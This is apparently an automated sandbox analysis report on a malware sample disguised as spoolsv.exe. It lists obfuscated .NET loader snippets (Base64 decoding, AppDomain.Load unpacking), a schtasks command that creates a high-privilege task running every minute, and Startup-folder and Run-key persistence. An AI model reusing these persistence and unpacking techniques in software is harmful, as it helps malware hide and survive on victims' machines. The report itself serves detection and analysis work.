                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: spoolsv.exe, x7j05yzOFssD5PY7KeGgRsqJbK757ypZ6eNoLvS4yQfSoE4bjxKDHW1gtM3qly47SHM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_81LLGXwgWmkFd3SGxubrUwK4NeGEoB7cqzKfxjQCxJgSIHtY81mPkYSAkM5hil0AWrrRUFcQXhTrHYuy09.vSFeQDR1xvcDfhO6z8NWvWDaqf2xyQyaDnDUTXAy4fIq3XAFP7vLBqTv85Q39fLzpEemyKGWW3wVbXRGJO,_81LLGXwgWmkFd3SGxubrUwK4NeGEoB7cqzKfxjQCxJgSIHtY81mPkYSAkM5hil0AWrrRUFcQXhTrHYuy09.OMtd40COtBm7f6gGy1exc62GZ7szLBouixp2GOqjBqYDVRWIZqJYyu2wum1fY2Mm0RPpfFyasyUFFm8ELY,_81LLGXwgWmkFd3SGxubrUwK4NeGEoB7cqzKfxjQCxJgSIHtY81mPkYSAkM5hil0AWrrRUFcQXhTrHYuy09.Os5BCDfE9LQsj0S2jP3VbbT0cP2FqVz57LlzAGoL5FxTgbiwNPPlC3cF546aWeBRhHeQDKR3mxn0XPM2lI,_81LLGXwgWmkFd3SGxubrUwK4NeGEoB7cqzKfxjQCxJgSIHtY81mPkYSAkM5hil0AWrrRUFcQXhTrHYuy09.KK5QygKqCmPzZ0G78qVUqZrJhtnMJAzCGFTQgBKZlqYL1HdioD7UjNiXhDYywrcjXRCGrKx6jKI4SE9YrH,jnVW0Qv7jP.Iim78zZqgP()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: spoolsv.exe, x7j05yzOFssD5PY7KeGgRsqJbK757ypZ6eNoLvS4yQfSoE4bjxKDHW1gtM3qly47SHM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{pVHoAaHeLMkEkHgBD2aI5LWhOWhi7Xaw4z1TlLwgWtBzI3lDBlOjYjPhYadRAwVt92m[2],jnVW0Qv7jP.fDfppl8dxZ(Convert.FromBase64String(pVHoAaHeLMkEkHgBD2aI5LWhOWhi7Xaw4z1TlLwgWtBzI3lDBlOjYjPhYadRAwVt92m[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            .NET source code contains potential unpacker
                            Source: spoolsv.exe, x7j05yzOFssD5PY7KeGgRsqJbK757ypZ6eNoLvS4yQfSoE4bjxKDHW1gtM3qly47SHM.cs.Net Code: qOmo6oXczOeEAZi2BRVRsmv3V3l1mofoIKLjhTkNu5aRMcINcF2CYlMn0jj8033WHwk System.AppDomain.Load(byte[])
                            Source: spoolsv.exe, x7j05yzOFssD5PY7KeGgRsqJbK757ypZ6eNoLvS4yQfSoE4bjxKDHW1gtM3qly47SHM.cs.Net Code: eyavGJq6IE6BxX75XqpneDXYDn407dyz7L6xtsFXRoxXNgy6PSRCAqXlIZRUpB7pa4P System.AppDomain.Load(byte[])
                            Source: spoolsv.exe, x7j05yzOFssD5PY7KeGgRsqJbK757ypZ6eNoLvS4yQfSoE4bjxKDHW1gtM3qly47SHM.cs.Net Code: eyavGJq6IE6BxX75XqpneDXYDn407dyz7L6xtsFXRoxXNgy6PSRCAqXlIZRUpB7pa4P
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC49D2A5 pushad ; iretd 8_2_00007FFAAC49D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC682316 push 8B485F91h; iretd 8_2_00007FFAAC68231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC45D2A5 pushad ; iretd 11_2_00007FFAAC45D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC5700BD pushad ; iretd 11_2_00007FFAAC5700C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC5719E2 pushad ; ret 11_2_00007FFAAC5719F1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC642316 push 8B485F95h; iretd 11_2_00007FFAAC64231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC46D2A5 pushad ; iretd 14_2_00007FFAAC46D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC5823FB pushad ; retf 14_2_00007FFAAC582401
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC652316 push 8B485F94h; iretd 14_2_00007FFAAC65231B
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF22E6 push ecx; ret 27_2_73CF22F9
                            Source: spoolsv.exe, 6D4pjvGREd.csHigh entropy of concatenated method names: 'kBQGZgRqdr', 'Takww7qCV4', 'QbEkUsjn9m', 'qvAC0IgS3p8LnQhcXTC', 'j2xswRRW1I7MMasGHFH', 'enLF8Iz3ilqK0CoXxlE', '_84aD13K8zccJKa9UsOQ', '_7TszRwUJXD3sF9kIkiE', 'SyrJ2SgEfFuop8pwpj4', 'Y0IR08HChrmM6ltmWlU'
                            Source: spoolsv.exe, 81LLGXwgWmkFd3SGxubrUwK4NeGEoB7cqzKfxjQCxJgSIHtY81mPkYSAkM5hil0AWrrRUFcQXhTrHYuy09.csHigh entropy of concatenated method names: 'gjmrbWl0W2oGtbUiDW3i4GPM8GGYTOvHaGgIcljUoAKgN1YfS5EljpSsyAkFl9HpjkqpFrKJWRQpyfNIhhZ4VYpUzOkT', '_5SYl9QD1iWjiI2xsHzAEJn57BWIiXXU5MaJQE6grwi5T44daDn2VTwNIvwOme5jLSGwExrC1sE0RRzIfJZxaz0BbB6a6', '_9A2H9Vj4udVPoCFCmyRMtBHfPTwHlAPA1uILm2YKyZEZSpfEVwXqrjvL7yZRRrGBIArIdHmxwYis4UcvWQxd1yUOpboh', 'nKhhZx0eu3wd8FUwxb7JB4RpAOd5iF3dDn8lfGzA9kOTRVaRes8dSp11vmj2NmeG48ORSKACnmdKOwJmVUsQEoNl9b4h'
                            Source: spoolsv.exe, NTH0PbLBVXDOnk2qLzSeK3LH22MgKzbnbwlji0PICcOOBDW33Y.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'F6q2Uwfz4AgKZyjQROf0OJTzpHQQ00gWEjRE8qWZi0G3Y1pQWWLZ41xYRm4', '_0PvEJhBN6dt0df3xQg9wmWYPCECxWWQR6U4wo5BlVETHo5KWpNd2Q8CrHe6', 'Fu0xG9LDsJGKd3bZFigqbgAtFXY50y0A9yPsRQsRtI1py1dKZOlcFkz2aL2', 'ZPDhY0TVrQ3gpo9InZNvUdZXuejVdXShmgp9VcUyDaKuYPaCvaHWMp1cYuk'
                            Source: spoolsv.exe, ZwLUmu9cqratZu915eMghXRoDHu6UN6Q0gIYIPFL4YLRlVj3zMc4vlXwL9W6iahSFW85bEm8g6KqE5znj3.csHigh entropy of concatenated method names: 'sX1rZUYrQl97M8kyMWgs17tEgVhhkY1RgPnTTfyE9BbxE0m6I2EeBdP4IsNYuYPfLgaw7PBUSiNd8EBZe4', 'pvfxpDVTly89p6lAKzdlnNpAtbQpCbx8Gm6IV2t79W3SkgjaMlYAX5E7U8CymsylO6JyaoziphdCXeTsYh', 'LyvrWTLTLcWwnPkPrRvee7eVVN0vg0OcHeKkLElNcX4rRNPPguxAqYe6f2rq1suqo5CWCryUgOc9mCwqqL', 'OsFA8X8AU9U9sNTT2TDarN9u347ZCN3isRyWIPUVCb2i53F9JP23NBvxsZNUIhpUQI5LL0dgkFVDKeTv0u', 'jauJOqRSKc8N3A6xPJNCkdmo6tFW2m9HZwgKXOz8jzfZT6ghXmehfcgIEETZ53AeODrh8Jv3lxfaUR2Lo1', 'MbLXXLMhZWHNOA1G5nG8y7zoMy0Vn4ZKMjFtgi7BqTAxZFUo15HCecXRXkSo4ZHAWo1Cdaw26FkgnqSfva', 'U0moxeN2LfpDEpKbsqFhO9QJ0Z2l3MGb8is8LVP1Fz96Ukn3fOvHMailB64zUfHcP2HpOpO0EN5GwCWidp', '_9xKLRRBeNhgMpqBGETv0IeSlEJsIwqXs0e9iTMuq0N92ihjBPBuHgUqCPPEvUbLrej70DmhTucovbYem9f', 'RhfDETRzL9uuBCfFjIdWPMmfiq89hq1yBqJO0BhhGBawDepqHPdxExBoA6UMv8HXfQWxWl6aloa47BX0br', '_8g4qyOiVuIbmdtc9kVs7MeUa4xipQNY5w9qWagAnpDy47cl94bMENg4aBMMvxX61oWazrucC50cwAhW1AA'
                            Source: spoolsv.exe, GOX8NXki99.csHigh entropy of concatenated method names: 'OW8VeZZp9m', 'l4XGGuqIb1', 'ITnc5uA3Nn', 'MhHKwvse4PBiK12UpVi', 'geBWI8gCnY9MhIqVxd7', 'lYnsVFI2oogRLBoE1pp', 'dNrCrSioXQinSEowA9d', '_4hN2LAS5lwXo1E2WSuk', 'eFReyCK0hjDe8PffRuD', 'FrLKlTFb8mPRFPsbLMr'
                            Source: spoolsv.exe, x7j05yzOFssD5PY7KeGgRsqJbK757ypZ6eNoLvS4yQfSoE4bjxKDHW1gtM3qly47SHM.csHigh entropy of concatenated method names: 'bj0IyHL2VfwxUOwMLYi8WK1fs06tjpUKxR2H0UVqWg59zDTCxw3uXGSLsOqDSGuExAq', 'qOmo6oXczOeEAZi2BRVRsmv3V3l1mofoIKLjhTkNu5aRMcINcF2CYlMn0jj8033WHwk', 'ewmtjpT1qVnw7fpx5KntX90OAEMfcAyFCGX6Wv5lngbRDENx05u9RdrVv5VM3t9LRgi', 'p4b869AVwBahjnWY4kCWuzGJVxD9DZJmYvJ0gptU6dWy1JbOydCq7xWul0DIBqxNKIQ', 'sjlIUQpWpEtQ9mDkF7FxCcztMyVINCy5rvNmPVQFkC8MhYuerBSirTaDX5HS7gaRFUu', 'J1McS80ARemeeyxkbMMLrehv0o8Bu2EAfy4hNyHraNfMThTkUYB8MyaGo7XFGw1ovaT', 'mumx541x4V3AzyaJwsvMh5tFmS86L53WchpsARaJxqBoFpSeUZLeCvSbPQMkVAvAway', 'oYuT49Ms5zt0emd1ZfLps2P16VJeUgLDiEYjUEStPMIzeHDtpqgUnbtHcT1ldMJoX0f', 'xzoKVog1HseOM1rZ7kUSEQGPws6w48aUTAMSUW1kfzNKQdxtKT1EmWdw7dJjZ40dBoe', 'IXyMd0fKCTa0Uu3z1gTRuCxGnkCUaWPVZiRg0CTGK7wxEZI339dSXtTye6pQYvErqxq'
                            Source: spoolsv.exe, ZAe6rYgAvSEYLloZ9pFiUYGqhM6V22RVAxeYAQ4RLU7gqconupONCSVxHobHtc6U4b5HJlmYsyZluRs1EF.csHigh entropy of concatenated method names: 'wqv6MlM4XvjALnPp71RE0XkdANJeiGUxMUTUUQZfCN2vkFEXuK273UE70Tt3zVatcHu1PRAG8lZXs8xA8P', 'vkNPrl5J0JbKePwYJVyc1tiARpRrhkNvVEcCoYzjRUDt3ml743Z9Hxppfns7Ox32FkBvQUlp0q3jH60mYE', 'idV6GvSeFZYioCOlJhwZLq3qDft9DmIqDw4gWwThWW8skYM5E3pQL3WevoR48lm612TJnQ5GkUPknv5mfy', 'pBVgR4ZfibCW0KEGC1Vw5K9IkG9tpAeP0a2BBD4z3BH2CHfL74qfpva96ENZ8ih7eDCylCRBhh6A0Zl0t9', 'fRUA7arAVa7sMiyFdftysEzihbajNIMDquAJMgN4VXjWL19p023eWIe652wASZS2E7Zub3i5Uw7N6BIQsZ', 'MwJW4ecIEECI3xHX3CKmSuQkbexG0M5iOLp4QZ0g5CGnp0LTmBLKEgIgUuZHiKQII458noyhFB7OSwU8gu', '_9Q9jFxnetlQqprI14HDuRdCcdYVBsh8Gf108BwQ0sfsVzpi2wQf2tbrHOWRa48UeS2H5W3iI5o7X0sofWC', '_5LgbypqppmB4wt5h24Fdv7oAiMQ4kBOj9fq23QK4Cp6dEwY7C8mnxH7QmcfDruA8jXGszhF6079y9drrSs', 'MFqgD1pPnXCibWNXuwLyn2nybs5gpwZzxPbm4KQ2gg1GoQsmQrSmtX9BXKn1QC9P1xCSsEL1rDJNvjjwZ3', '_4uK5TgfVnLqgh3Zgc4Ugh32Nqg7yYW81CePyytx6Uxv4VzyKBKfVhPDBcGeaeRQ4CxvjDHuPN2JKtsMLDD'
                            Source: spoolsv.exe, s5R8pWQvpE.csHigh entropy of concatenated method names: 'noO8XCgA4R', 'g9Z0fmxYQO', 'xYPbgsKaCD', '_89Ax7MatOE', 'fii2TDvGxo', 'IeDO8BSbd4', 'QaHMqpT1xf', 'iMuJPnVFqs', 's8oNW7vC7H', 'YIdzWP1Lwj'
                            Source: spoolsv.exe, 6JCGlHQ4hR.csHigh entropy of concatenated method names: 'orMlTDI0zp', 'qBkK8pUNmp', 'loYfXaSYIO', 'DkMt2eT3LH', 'XGu8WJbGcEMNPzXI6t6', 'I60p9eDliQ4mLrbKLAQ', 'KZgEVLRIyLwkirxGHjn', 'I0YjCZDpep9EY9Z1J0p', 'MdvE5cqen8RcRvFeKGk', 'NjWCLoXxKcvBaEdnPNP'
                            Source: spoolsv.exe, jnVW0Qv7jP.csHigh entropy of concatenated method names: '_68P1RUnjQA', 'DgzYsgcSvp', 'n8cH88b0gz', 'dG2zMUxS31', 'LqFVfw05E6', 'GySU3lSvIo', '_23onvofTGD', 'uU53MoCvj4', 'zGPUyCXow5', 'Mc9MKbr7pr'

                            Boot Survival

                            barindex
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe"
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spoolsv.lnkJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spoolsv.lnkJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spoolsvJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spoolsvJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Users\user\Desktop\spoolsv.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\spoolsv.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\1BE7C2BE68B9D4CE53EB 14C2BBCCDABB8408395D636B44B99DE4B16DB2E6BF35181CB71E7BE516D83AD9Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
